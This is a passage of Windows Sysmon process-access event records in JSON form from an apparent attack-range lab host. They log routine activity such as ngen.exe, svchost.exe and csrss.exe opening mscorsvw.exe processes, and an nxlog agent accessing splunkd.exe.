{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.528\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.528","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.559\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00108F1C0C00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.559","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00108F1C0C00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.559\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00108F1C0C00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.559","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00108F1C0C00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.575\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00108F1C0C00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.575","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00108F1C0C00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.606\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00104C200C00}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.606","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00104C200C00}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.606\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00104C200C00}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.606","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00104C200C00}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.622\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-00104C200C00}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.622","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-00104C200C00}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files 